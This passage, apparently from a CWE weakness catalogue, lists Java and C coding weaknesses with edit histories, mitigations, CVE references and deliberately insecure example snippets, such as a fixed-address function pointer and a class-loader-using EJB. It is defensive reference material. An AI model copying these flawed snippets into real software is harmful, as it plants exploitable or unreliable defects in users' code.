2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program violates the Enterprise JavaBeans (EJB) specification by using the class loader. - The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: "The enterprise bean must not attempt to create a class loader; obtain the current class loader; set the context class loader; set security manager; create a new security manager; stop the JVM; or change the input, output, and error streams." The specification justifies this requirement in the following way: "These functions are reserved for the EJB container. Allowing the enterprise bean to use these functions could compromise security and decrease the container's ability to properly manage the runtime environment." - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Other - Execute Unauthorized Code or Commands - Varies by Context - - - - - Architecture and Design - Implementation - Do not use the Class Loader when writing EJBs. - - - - - The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. The interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Class Loader for the EJB class to obtain the XML document from the local file system as an input stream. - - @Statelesspublic class InterestRateBean implements InterestRateRemote { - - private Document interestRateXMLDocument = null; - public InterestRateBean() { - try { - - - // get XML document from the local filesystem as an input stream - - - // using the ClassLoader for this class - ClassLoader loader = this.getClass().getClassLoader();InputStream in = loader.getResourceAsStream(Constants.INTEREST_RATE_FILE); - - - - - DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);} catch (IOException ex) {...} - } - - public BigDecimal getInterestRate(Integer points) {return getInterestRateFromXML(points);} - - /* member function to retrieve interest rate from XML document on the local file system */ - - private BigDecimal getInterestRateFromXML(Integer points) {...} - } - - This use of the Java Class Loader class within any kind of Enterprise JavaBean violates the restriction of the EJB specification against obtaining the current class loader as this could compromise the security of the application using the EJB. - - - An EJB is also restricted from creating a custom class loader and creating a class and instance of a class from the class loader, as shown in the following example. - - @Statelesspublic class LoaderSessionBean implements LoaderSessionRemote { - - public LoaderSessionBean() {try {ClassLoader loader = new CustomClassLoader();Class c = loader.loadClass("someClass");Object obj = c.newInstance();/* perform some task that uses the new class instance member variables or functions */...} catch (Exception ex) {...}} - public class CustomClassLoader extends ClassLoader { - } - } - - - - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The application stores a non-serializable object as an HttpSession attribute, which can hurt reliability. - A J2EE application can make use of multiple JVMs in order to improve application reliability and performance. In order to make the multiple JVMs appear as a single application to the end user, the J2EE container can replicate an HttpSession object across multiple JVMs so that if one JVM becomes unavailable another can step in and take its place without disrupting the flow of the application. This is only possible if all session data is serializable, allowing the session to be duplicated between the JVMs. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Quality Degradation - - - - - Implementation - In order for session replication to work, the values the application stores as attributes in the session must implement the Serializable interface. - - - - - The following class adds itself to the session, but because it is not serializable, the session can no longer be replicated. - - public class DataGlob { - String globName;String globValue; - public void addToSession(HttpSession session) {session.setAttribute("glob", this);} - } - - - - - - SFP1 - Glitch in computation - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software contains a protection mechanism that restricts access to a long filename on a Windows operating system, but the software does not properly restrict access to the equivalent short "8.3" filename. - On later Windows operating systems, a file can have a "long name" and a short name that is compatible with older Windows file systems, with up to 8 characters in the filename and 3 characters for the extension. These "8.3" filenames, therefore, act as an alternate name for files with long names, so they are useful pathname equivalence manipulations. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - System Configuration - Disable Windows from supporting 8.3 filenames by editing the Windows registry. Preventing 8.3 filenames will not remove previously generated 8.3 filenames. - - - - - CVE-1999-0012 - Multiple web servers allow restriction bypass using 8.3 names instead of long names - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012 - - - CVE-2001-0795 - Source code disclosure using 8.3 file name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795 - - - CVE-2005-0471 - Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471 - - - - File Processing - - - - Windows 8.3 Filename - - - SFP16 - Path Traversal - - - - - - - - Probably under-studied - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Windows 8.3 Filename - - - - The software contains a clone() method that does not call super.clone() to obtain the new object. - All implementations of clone() should obtain the new object by calling super.clone(). If a class does not follow this convention, a subclass's clone() method will return an object of the wrong type. - - - - - - - - - - Implementation - - - - - Integrity - Other - Unexpected State - Quality Degradation - - - - - Implementation - Call super.clone() within your clone() method, when obtaining a new object. - - - Implementation - In some cases, you can eliminate the clone method altogether and use copy constructors. - - - - - The following two classes demonstrate a bug introduced by not calling super.clone(). Because of the way Kibitzer implements clone(), FancyKibitzer's clone method will return an object of type Kibitzer instead of FancyKibitzer. - - public class Kibitzer { - public Object clone() throws CloneNotSupportedException { - - Object returnMe = new Kibitzer();... - } - } - public class FancyKibitzer extends Kibitzer{ - public Object clone() throws CloneNotSupportedException { - - Object returnMe = super.clone();... - } - } - - - - - - SFP28 - Unexpected access points - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Erroneous Clone Method - - - - The software does not maintain equal hashcodes for equal objects. - Java objects are expected to obey a number of invariants related to equality. One of these invariants is that equal objects must have equal hashcodes. In other words, if a.equals(b) == true then a.hashCode() == b.hashCode(). - - - - - - - - - - Implementation - - - - - Integrity - Other - Other - If this invariant is not upheld, it is likely to cause trouble if objects of this class are stored in a collection. If the objects of the class in question are used as a key in a Hashtable or if they are inserted into a Map or Set, it is critical that equal objects have equal hashcodes. - - - - - Implementation - Both Equals() and Hashcode() should be defined. - - - - - MET09-J - Classes that define an equals() method must also define a hashCode() method - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description, Other_Notes - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Object Model Violation: Just One of Equals and Haschode Defined - - - - The program declares an array public, final, and static, which is not sufficient to prevent the array's contents from being modified. - Because arrays are mutable objects, the final constraint requires that the array object itself be assigned only once, but makes no guarantees about the values of the array elements. Since the array is public, a malicious program can change the values stored in the array. As such, in most cases an array declared public, final and static is a bug. - - - - - - Primary - - - - - - - Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running. - - - - Implementation - - - - - Integrity - Modify Application Data - - - - - Implementation - In most situations the array should be made private. - - - - - The following Java Applet code mistakenly declares an array public, final and static. - - public final class urlTool extends Applet {public final static URL[] urls;...} - - - - - - OBJ10-J - Do not use public static nonfinal variables - - - 28 - Unexpected Access Points - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Background_Details, Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - Mobile Code: Unsafe Array Declaration - - - - The program violates secure coding principles for mobile code by declaring a finalize() method public. - A program should never call finalize explicitly, except to call super.finalize() inside an implementation of finalize(). In mobile code situations, the otherwise error prone practice of manual garbage collection can become a security threat if an attacker can maliciously invoke a finalize() method because it is declared with public access. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Alter Execution Logic - Execute Unauthorized Code or Commands - Modify Application Data - - - - - Implementation - If you are using finalize() as it was designed, there is no reason to declare finalize() with anything other than protected access. - - - - - The following Java Applet code mistakenly declares a public finalize() method. - - public final class urlTool extends Applet {public void finalize() {...}...} - - Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running. - - - - - MET12-J - Do not use finalizers - - - SFP28 - Unexpected access points - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - Mobile Code: Public Finalize Method - - - - The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded. - - - - - - Implementation - - - - - Other - Alter Execution Logic - - - - - Implementation - Do not use a return statement inside the finally block. The finally block should have "cleanup" code. - - - - - In the following code excerpt, the IllegalArgumentException will never be delivered to the caller. The finally block will cause the exception to be discarded. - - try {...throw IllegalArgumentException();}finally {return r;} - - - - - - ERR04-J - Do not complete abruptly from a finally block - - - ERR05-J - Do not let checked exceptions escape from a finally block - - - SFP6 - Incorrect Exception Behavior - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - - - The software contains an empty synchronized block. - An empty synchronized block does not actually accomplish any synchronization and may indicate a troubled section of code. An empty synchronized block can occur because code no longer needed within the synchronized block is commented out without removing the synchronized block. - - - - - - Indirect - - - - - - - - Implementation - - - - - Other - Other - An empty synchronized block will wait until nobody else is using the synchronizer being specified. While this may be part of the desired behavior, because you haven't protected the subsequent code by placing it inside the synchronized block, nothing is stopping somebody else from modifying whatever it was you were waiting for while you run the subsequent code. - - - - - Implementation - When you come across an empty synchronized statement, or a synchronized statement in which the code has been commented out, try to determine what the original intentions were and whether or not the synchronized block is still necessary. - - - - - The following code attempts to synchronize on an object, but does not execute anything in the synchronized block. This does not actually accomplish anything and may be a sign that a programmer is wrestling with synchronization but has not yet achieved the result they intend. - - synchronized(this) { } - - Instead, in a correct usage, the synchronized statement should contain procedures that access or modify data that is exposed to multiple threads. For example, consider a scenario in which several threads are accessing student records at the same time. The method which sets the student ID to a new value will need to make sure that nobody else is accessing this data at the same time and will require synchronization. - - public void setID(int ID){synchronized(this){this.ID = ID;}} - - - - - - SFP21 - Multiple locks/unlocks - - - - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - - - The software makes an explicit call to the finalize() method from outside the finalizer. - While the Java Language Specification allows an object's finalize() method to be called from outside the finalizer, doing so is usually a bad idea. For example, calling finalize() explicitly means that finalize() will be called more than once: the first time will be the explicit call and the last time will be the call that is made after the object is garbage collected. - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Other - Unexpected State - Quality Degradation - - - - - Implementation - Testing - Do not make explicit calls to finalize(). Use static analysis tools to spot such instances. - - - - - The following code fragment calls finalize() explicitly: - - - - // time to clean up - widget.finalize(); - - - - - - MET12-J - Do not use finalizers - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Name, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Explicit Call to Finalize - - - - The software sets a pointer to a specific address other than NULL or 0. - Using a fixed address is not portable, because that address will probably not be valid in all environments or platforms. - - - - - - - Indirect - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If one executes code at a known location, an attacker might be able to inject code there beforehand. - - - Availability - DoS: Crash, Exit, or Restart - Reduce Maintainability - Reduce Reliability - If the code is ported to another platform or environment, the pointer is likely to be invalid and cause a crash. - - - Confidentiality - Integrity - Read Memory - Modify Memory - The data at a known pointer location can be easily read or influenced by an attacker. - - - - - Implementation - Never set a pointer to a fixed address. - - - - - This code assumes a particular function will always be found at a particular address. It assigns a pointer to that address and calls the function. - - int (*pt2Function) (float, char, char)=0x08040000;int result2 = (*pt2Function) (12, 'a', 'b'); - // Here we can inject code to execute. - - - - The same function may not always be found at the same memory address. This could lead to a crash, or an attacker may alter the memory at the expected address, leading to arbitrary code execution. - - - - - INT36-C - Converting a pointer to integer or integer to pointer - Imprecise - - - SFP1 - Glitch in computation - - - - - CWE Content Team - MITRE - 2006-12-15 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Common_Consequences, Weakness_Ordinalities - - - - - Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption. - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Memory - Adjacent variables in memory may be corrupted by assignments performed on fields after the cast. - - - Availability - DoS: Crash, Exit, or Restart - Execution may end due to a memory access error. - - - - - Requirements - The choice could be made to use a language that is not susceptible to these issues. - - - Implementation - Review of type casting operations can identify locations where incompatible types are cast. - - - - - The following example demonstrates the weakness. - - struct foo{int i;}...int main(int argc, char **argv){*foo = (struct foo *)main;foo->i = 2;return foo->i;} - - - - - - SFP7 - Faulty Pointer Use - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - - - The software uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences. - Some functions that offer security features supported by the OS are not available on all versions of the OS in common use. Likewise, functions are often deprecated or made obsolete for security reasons and should not be used. - - - - - - Indirect - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Implementation - Always test your code on any platform on which it is targeted to run on. - - - Testing - Test your code on the newest and oldest platform on which it is targeted to run on. - - - Testing - Develop a system to test for API functions that are not portable. - - - - - MET02-J - Do not use deprecated or obsolete classes or methods - - - SER00-J - Maintain serialization compatibility during class evolution - - - SFP3 - Use of an improper API - - - - - - - - CWE Content Team - MITRE - 2006-12-15 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Call to Limited API - - - - The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource. - - - - - - - Resultant - - - - - - - - - Soft links are a UNIX term that is synonymous with simple shortcuts on windows based platforms. - - - - insecure temporary file - Some people use the phrase "insecure temporary file" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all. - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Confidentiality - Integrity - Access Control - Read Files or Directories - Modify Files or Directories - Bypass Protection Mechanism - An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism then an attacker may be able to bypass the mechanism. - - - Other - Execute Unauthorized Code or Commands - Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since a ".LNK" file can be uploaded like a normal file. This can enable remote execution. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Separation of Privilege - - Follow the principle of least privilege when assigning access rights to entities in a software system. - Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. - - - - - - CVE-1999-1386 - Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386 - - - CVE-2000-1178 - Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178 - - - CVE-2004-0217 - Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217 - - - CVE-2003-0517 - Symlink attack allows local users to overwrite files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517 - - - CVE-2004-0689 - Window manager does not properly handle when certain symbolic links point to "stale" locations, which could allow local users to create or truncate arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689 - - - CVE-2005-1879 - Second-order symlink vulnerabilities - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879 - - - CVE-2005-1880 - Second-order symlink vulnerabilities - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880 - - - CVE-2005-1916 - Symlink in Python program - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916 - - - CVE-2000-0972 - Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972 - - - CVE-2005-0824 - Signal causes a dump that follows symlinks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824 - - - CVE-2001-1494 - Hard link attack, file overwrite; interesting because program checks against soft links - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494 - - - CVE-2002-0793 - Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793 - - - CVE-2003-0578 - Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578 - - - CVE-1999-0783 - Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783 - - - CVE-2004-1603 - Web hosting manager follows hard links, which allows local users to read or modify arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603 - - - CVE-2004-1901 - Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901 - - - CVE-2005-1111 - Hard link race condition - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111 - - - CVE-2000-0342 - Mail client allows remote attackers to bypass the user warning for executable attachments such as 